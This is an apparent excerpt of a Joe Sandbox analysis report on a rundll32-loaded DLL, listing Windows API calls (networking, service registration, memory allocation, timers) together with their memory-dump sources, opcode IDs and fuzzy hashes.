                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: dad356ac42783e76d3cf91e48cabaf882a4a52e62c98378efd60bf509c916298
                              • Instruction ID: 0e349c0a45bb4f16f21d9bf5092175465f0f06c9d92dc0a0f0d34807e97ed062
                              • Opcode Fuzzy Hash: dad356ac42783e76d3cf91e48cabaf882a4a52e62c98378efd60bf509c916298
                              • Instruction Fuzzy Hash: ECF09671A04108BBDB44DFA4DC50EEE77BCAB45204F404514BA05936A0DF31B86987B2
                              APIs
                              • setsockopt.WS2_32(00000003,?,?,?,?,00000003,00000000), ref: 6CD72C3E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: setsockopt
                              • String ID:
                              • API String ID: 3981526788-0
                              • Opcode ID: 33aa635ea641d7b2bbf4fc67c1b7518cf2bd9494986aeaef0e39e160fadc9dce
                              • Instruction ID: 41380333d35e9061f371a5c5c1950f4832554ca2471d8a1473a7333a0266beda
                              • Opcode Fuzzy Hash: 33aa635ea641d7b2bbf4fc67c1b7518cf2bd9494986aeaef0e39e160fadc9dce
                              • Instruction Fuzzy Hash: 77F0BB71A04108BBDF14DFA4DC50EDBB7BCAB49304F404615FD0593660DB30A969CBB1
                              APIs
                              • SetTimer.USER32(00000000,?,?,?,00000000,00000000,?,?,?,6CD51206,?,6CD7D9A0,00000000,6CD78224,00000004,C0505E62), ref: 6CD63ECA
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Timer
                              • String ID:
                              • API String ID: 2870079774-0
                              • Opcode ID: 642c631768ab5b01f60a1d3519f165255ea776a0c5d062dafa75fb49f30b7342
                              • Instruction ID: 92de62b967c386fc13979cbeb93dd69bfb448874b9ce9790402977162e8b8f72
                              • Opcode Fuzzy Hash: 642c631768ab5b01f60a1d3519f165255ea776a0c5d062dafa75fb49f30b7342
                              • Instruction Fuzzy Hash: 13F05E76A00108BBEF00DFA4EC41E9E3BBCAB04205F404614FA0693A60EB74993CC7F2
                              APIs
                              • RegisterServiceCtrlHandlerExW.ADVAPI32(6CD51430,?,?,6CD51430,00000000,?,6CD7D8E8), ref: 6CD52506
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CtrlHandlerRegisterService
                              • String ID:
                              • API String ID: 1823773585-0
                              • Opcode ID: ece4e555ece233fb5ff78e6cfd6db67ad757d928d4604c05794b1f3c186408fb
                              • Instruction ID: 0f064574d4ec71f31ccaf7aad8757ddb87bc185540fb9de38339d89bcf608bd5
                              • Opcode Fuzzy Hash: ece4e555ece233fb5ff78e6cfd6db67ad757d928d4604c05794b1f3c186408fb
                              • Instruction Fuzzy Hash: B9F0E275A01148ABFF00DF60DC41FAE37BCAB45204F404618FD0656A61DB30682887A1
                              APIs
                              • connect.WS2_32(6CD6BECA,?,?,6CD6BECA,?), ref: 6CD76DE6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: connect
                              • String ID:
                              • API String ID: 1959786783-0
                              • Opcode ID: 45c172d999c75058e427c133feacb02cc9d5dee3c1c8aaa8deeef8986d1895c1
                              • Instruction ID: cc115691ef2b4949235425078b16cef59aeddd6da6486c9fededc9b6fb51688c
                              • Opcode Fuzzy Hash: 45c172d999c75058e427c133feacb02cc9d5dee3c1c8aaa8deeef8986d1895c1
                              • Instruction Fuzzy Hash: 74F08275A04108BBDF40DB60DC45EAE7778AB19205F84861ABA05A7A60EB3165298BB1
                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000028,?,?,00000028,00000000), ref: 6CD66566
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: ebed34cb5d0192e69e4b94a4199ed589c0e709f46a7918ef62d8aaea67947168
                              • Instruction ID: 80a1e222d88c420cc964e3d0e2771c793e8563ae3b6f6a0b86c20c1615034f07
                              • Opcode Fuzzy Hash: ebed34cb5d0192e69e4b94a4199ed589c0e709f46a7918ef62d8aaea67947168
                              • Instruction Fuzzy Hash: FCF082B5A00108BBEB40EF64DC45EAE37B8AB05705F404519F90592B60EB31552887B6
                              APIs
                              • ioctlsocket.WS2_32(00000003,?,?,00000003,00000000), ref: 6CD72D66
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: ioctlsocket
                              • String ID:
                              • API String ID: 3577187118-0
                              • Opcode ID: ee4236a2a702e8c3edbecc3c18ab7b1e37d68fd5d564df37df11398e5de44bde
                              • Instruction ID: 952a8bfb649fa073c06233ede1a3d3eb15d8312998342280d346b1bac7659fbc
                              • Opcode Fuzzy Hash: ee4236a2a702e8c3edbecc3c18ab7b1e37d68fd5d564df37df11398e5de44bde
                              • Instruction Fuzzy Hash: 98F08975A40148B7DB00EB60DC45F9E7778DB55205F804619F90566660DB7065A887E1
                              APIs
                              • getsockname.WS2_32(FC1009F2,?,?,FC1009F2,00000010,6CD6BF40,?), ref: 6CD76ED6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: getsockname
                              • String ID:
                              • API String ID: 3358416759-0
                              • Opcode ID: d63d86737e5609536dd5f63d6b5a6c6031ab1265f10a343c45f619f3455087b8
                              • Instruction ID: ec0f3654287fcc86d377941f9c5ff509f070b4204eb7330926dff23d9a195a14
                              • Opcode Fuzzy Hash: d63d86737e5609536dd5f63d6b5a6c6031ab1265f10a343c45f619f3455087b8
                              • Instruction Fuzzy Hash: 48F08275A05248BBEF40DF64DC42FAF7778AB05308F804619BA0997661EB70A92987B1
                              APIs
                              • RtlAllocateHeap.NTDLL(00000008,?,?,00000008,6CD5404E,6CD5404E,?,00000000,?), ref: 6CD52816
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 74dbb6728f1d286a8b1fa667c5bfe827359f01a5e9dd11901c193e6843bc4328
                              • Instruction ID: ee6f9b31ac0439b0e8558a1c15f10d79069e23cd68e3151fcff2fc9e01a727dd
                              • Opcode Fuzzy Hash: 74dbb6728f1d286a8b1fa667c5bfe827359f01a5e9dd11901c193e6843bc4328
                              • Instruction Fuzzy Hash: 80F02775A01208BBEF40DFA0DC84EAE7B78BF51209F408119F902A2BA0DB30556C87F1
                              APIs
                              • RtlFreeHeap.NTDLL(6CD5402A,?,?,6CD5402A,00100000,00000000,?), ref: 6CD52886
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: 65450ccf743c13e6fa79299203e1e4126f4d4af6ef41b5e046ef13e7b51b78e3
                              • Instruction ID: 0dd580bd0d2d2a708221308a568d5da5b2507102375ab74cf0daad19c774bea0
                              • Opcode Fuzzy Hash: 65450ccf743c13e6fa79299203e1e4126f4d4af6ef41b5e046ef13e7b51b78e3
                              • Instruction Fuzzy Hash: 10F08275A05109BBEF04DFA4DC54EAE7B78AB11209F40451AFE0566B60EB3095298BF1
                              APIs
                              • socket.WS2_32(00000003,?,?,00000003,00000000), ref: 6CD72B56
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: socket
                              • String ID:
                              • API String ID: 98920635-0
                              • Opcode ID: 5cd40c1645c14745527f3d399d6dd96a5833a0befe4364d1993fc28cce2381be
                              • Instruction ID: 130d49fea7ff32c0168649605018614dc47385a6768889c07e35125f2aeb164f
                              • Opcode Fuzzy Hash: 5cd40c1645c14745527f3d399d6dd96a5833a0befe4364d1993fc28cce2381be
                              • Instruction Fuzzy Hash: 11F02771E08108BBDF00EF64DC50FAE77BCAB85209F804319F90557660EB30A56887B1
                              APIs
                              • WSAStartup.WS2_32(00000202,?,00000202,?), ref: 6CD76D23
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: e72a6f6ce703aa31e7feeb420ad4b7cd24b56d16e9627383b1b00c8c2fe94ed7
                              • Instruction ID: 379e3439c21b5382db8d54de69601a3011fceda44eeb5db5fdb9d07a37915e51
                              • Opcode Fuzzy Hash: e72a6f6ce703aa31e7feeb420ad4b7cd24b56d16e9627383b1b00c8c2fe94ed7
                              • Instruction Fuzzy Hash: 35F0E531A00108B7EF50ABB0DC1AFAD77BCAB15309FC04615FA02A2A60FB30552D83B1
                              APIs
                              • shutdown.WS2_32(00000003,?,00000003,00000000), ref: 6CD72CA2
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: shutdown
                              • String ID:
                              • API String ID: 2510479042-0
                              • Opcode ID: e2764e321720279d74f118bf49c2681229943feff53a3246b0ebcaff81fea256
                              • Instruction ID: b5b37b227f2e8ccb0f6cd1d0d7d09c86e1dca0d39b50681c3f623605cefe0f25
                              • Opcode Fuzzy Hash: e2764e321720279d74f118bf49c2681229943feff53a3246b0ebcaff81fea256
                              • Instruction Fuzzy Hash: 32F0EC75E002487BEF00FB60DC15F9D777CA751209F400619F90562A60EB70656CC7F1
                              APIs
                              • SetThreadPriority.KERNEL32(00000000,?,00000000,000000FE), ref: 6CD74FE2
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: PriorityThread
                              • String ID:
                              • API String ID: 2383925036-0
                              • Opcode ID: 42857ab16e7a6299d6bf1809229be9953031de691842af9566a09b10cefa3fb0
                              • Instruction ID: 232efa7751b5a2382902f556378489b75beeb6a76766cca0bdc1d1cbc89f1b62
                              • Opcode Fuzzy Hash: 42857ab16e7a6299d6bf1809229be9953031de691842af9566a09b10cefa3fb0
                              • Instruction Fuzzy Hash: F7F0E579B00108BBEF40EFA0DC40EA97778EB04209F808116B90666AA1EB30956C8BF1
                              APIs
                              • InternetCloseHandle.WININET(6CD7153F,6CD7153F,00000000,00000000,00000000,00001000), ref: 6CD71C8E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandleInternet
                              • String ID:
                              • API String ID: 1081599783-0
                              • Opcode ID: bf52bbd2db66bd9e44b4533dfad085d2fee0b515ae873ebf53cba4c71f462a43
                              • Instruction ID: 1a34270ccf5241e039cdcb4411e4c77f8f10ee1e40c0502b3c89ccdc8df6356f
                              • Opcode Fuzzy Hash: bf52bbd2db66bd9e44b4533dfad085d2fee0b515ae873ebf53cba4c71f462a43
                              • Instruction Fuzzy Hash: 7CE06571E0410877EF009BB0DD95EEE76B8AB15205F404695EA0566BA0DF31A52D87B2
                              APIs
                              • FindCloseChangeNotification.KERNEL32(00020008,00020008,00000000), ref: 6CD56F7E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 2862687b37968d99fcc3cea738217dd7bb03a4c77093d750d5867d8eb56867aa
                              • Instruction ID: 5f746846c8e2ecff8fbaa65ccf7a17f48c90812a418902f7a911a27dec9a5113
                              • Opcode Fuzzy Hash: 2862687b37968d99fcc3cea738217dd7bb03a4c77093d750d5867d8eb56867aa
                              • Instruction Fuzzy Hash: 06E0657DA08104ABEF00EFB1DC05FADB67C9B11209F404669A91567A61EF70D56C8BA1
                              APIs
                              • gethostbyname.WS2_32(00000003,00000003,00000000), ref: 6CD6D95E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: gethostbyname
                              • String ID:
                              • API String ID: 930432418-0
                              • Opcode ID: 7ef5c247c825d72d8fcdbea57a7d5eaad840772876cb0382bfea117f7d256506
                              • Instruction ID: ac761d9519ab18adb88fa8407c55cd4ec587835cc36b45bbcedc556e5f5c259e
                              • Opcode Fuzzy Hash: 7ef5c247c825d72d8fcdbea57a7d5eaad840772876cb0382bfea117f7d256506
                              • Instruction Fuzzy Hash: 69E0E530E002087BFF00AB60EC44EAE777C9B01219F401621B90163AA0EB30557983A1
                              APIs
                              • VirtualAlloc.KERNEL32(?,?,?,?,?,6CD6E40E), ref: 6CD5371A
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 539a0726094d348e2a04e5b7ef643a528ab2cfb0fcb54ac4e4ca118b484b0bd1
                              • Instruction ID: 4f7e6e94b9f1c4ee54ddf013e898287d6fa8900d735b89b917a7d526e38606e1
                              • Opcode Fuzzy Hash: 539a0726094d348e2a04e5b7ef643a528ab2cfb0fcb54ac4e4ca118b484b0bd1
                              • Instruction Fuzzy Hash: 6AF08975B05109BBDF00DFA4DC50F9E3BBCAB46305F414555F90567A60EB709D2887B1
                              APIs
                              • VirtualFree.KERNELBASE(00000000,?,?,00000000,00008000,?,6CD6E762,00000001), ref: 6CD53786
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: 4176f8359608c8c30addf78dd67cf5dd0635cab5e262e43529ee2f6d2d4d1aa6
                              • Instruction ID: 9764ae590ad41cf6b9da0b832190ec3d0d969108077ca1c07380b0f198fd9d10
                              • Opcode Fuzzy Hash: 4176f8359608c8c30addf78dd67cf5dd0635cab5e262e43529ee2f6d2d4d1aa6
                              • Instruction Fuzzy Hash: 3FF0E276B05204BBEF40DFA0DC80FAE7B78AB11309F414119B90663B60DB70996887F1
                              APIs
                              • lstrcmpiW.KERNEL32(00000000,?,00000000,00000000), ref: 6CD52442
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: lstrcmpi
                              • String ID:
                              • API String ID: 1586166983-0
                              • Opcode ID: 674d5733410fdc44829c5af2cc6ff86ead170543a98c4741c94542f0773d9792
                              • Instruction ID: ab44963cc35f3ed2a3e9543a8ab3320ebbcead6cbf3dcf8efc653e332c127c69
                              • Opcode Fuzzy Hash: 674d5733410fdc44829c5af2cc6ff86ead170543a98c4741c94542f0773d9792
                              • Instruction Fuzzy Hash: CDF0A775A01108ABEF509F64DC05E997778A712245F40C119B90666A60DB30556D8BA1
                              APIs
                              • Sleep.KERNEL32(6CD51519,6CD51519,00000BB8,00000000,00000000), ref: 6CD5225E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: edf6a095fdad8a5a78be644f7679bee5ec9700c504c564f1a52b7c0f0633cdec
                              • Instruction ID: de164c1064fa330fdfed937778533290d94e84de4978e00b52ffbc5c560cd5ff
                              • Opcode Fuzzy Hash: edf6a095fdad8a5a78be644f7679bee5ec9700c504c564f1a52b7c0f0633cdec
                              • Instruction Fuzzy Hash: 31E02B74E022046BEF109FB4DC45F9A377CEB06349F800125FA0266A61EB30143C86F1
                              APIs
